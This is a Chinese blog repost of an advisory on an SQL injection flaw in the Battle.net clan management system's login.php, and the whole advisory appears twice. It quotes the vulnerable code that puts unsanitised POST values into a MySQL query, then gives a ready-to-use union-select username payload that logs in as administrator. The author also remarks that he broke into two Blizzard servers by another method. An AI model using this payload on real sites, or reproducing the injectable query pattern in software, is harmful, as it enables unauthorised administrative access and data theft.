转自:cnfjhh's blog
Battle.net clan管理系统使用MySQL后端,允许用户方便的升级和维护web站点。
系统实现上存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击,非授权获取系统的管理权限。
Battle.net clan的login.php脚本没有正确地验证通过index.php对user参数的输入:
line 9 --> $user = $_POST['user'];
line 10--> $pass = $_POST['pass'];
.....
.....
.....
line 21--> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);
允许攻击者以管理员权限登录。但成功攻击要求禁用了magic_quotes_gpc。
Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*
password : enything
注:sourceforge上发布的这个和我12月份拿到暴雪某两个负载时候的方法不同,他们是今年4月多发现的
Battle.net clan管理系统使用MySQL后端,允许用户方便的升级和维护web站点。
系统实现上存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击,非授权获取系统的管理权限。
Battle.net clan的login.php脚本没有正确地验证通过index.php对user参数的输入:
line 9 --> $user = $_POST['user'];
line 10--> $pass = $_POST['pass'];
.....
.....
.....
line 21--> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);
允许攻击者以管理员权限登录。但成功攻击要求禁用了magic_quotes_gpc。
Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*
password : enything
注:sourceforge上发布的这个和我12月份拿到暴雪某两个负载时候的方法不同,他们是今年4月多发现的
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
